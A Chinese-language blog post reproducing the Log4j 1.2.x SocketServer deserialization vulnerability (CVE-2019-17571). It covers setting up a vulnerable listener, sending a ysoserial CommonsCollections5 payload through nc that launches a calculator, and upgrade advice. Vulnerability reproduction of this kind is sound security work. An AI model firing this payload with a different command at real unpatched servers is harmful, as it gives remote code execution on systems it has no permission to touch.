Apache Log4j SocketServer反序列化漏洞复现
Apache Log4j 是一个基于 Java 的日志记录工具,是 Apache 软件基金会的一个项目,是几种 Java 日志框架之一。
近日, Apache Log4j 官方披露在 1.2.x 版本中的 SocketServer 类存在反序列化漏洞( CVE-2019-17571 ),攻击者可利用漏洞可实现远程代码执行。
Log4j 1.2.x 版本中的 org.apache.log4j.net.SocketServer 类,存在反序列化漏洞。使用 Log4j SocketServer 类创建的 Socket 监听服务处理接受数据时,容易对不可信数据进行反序列化,结合反序列化小工具,攻击者可以实现远程代码执行。
环境搭建
用到的 jar 包:
java -cp log4j-1.2.17.jar:commons-collections-3.1.jar org.apache.log4j.net.SocketServer 8888 ./log4jserver.properties ./
漏洞复现
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 "open -a Calculator" | nc 127.0.0.1 8888
发送 payload 后,成功弹出计算器:
修复建议
Apache Log4j 的 1.2 系列版本官方在 2015 年 8 月已停止维护,在 2.8.2 版本中已修复了该漏洞,建议尽快升级到 2.8.2 或更高的版本; 下载地址: https://logging.apache.org/log4j/2.x/download.html
停止使用 Log4j 的 SocketServer 类创建 Socket 服务,未使用 Log4j 的 SocketServer 类的功能不受漏洞影响;
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论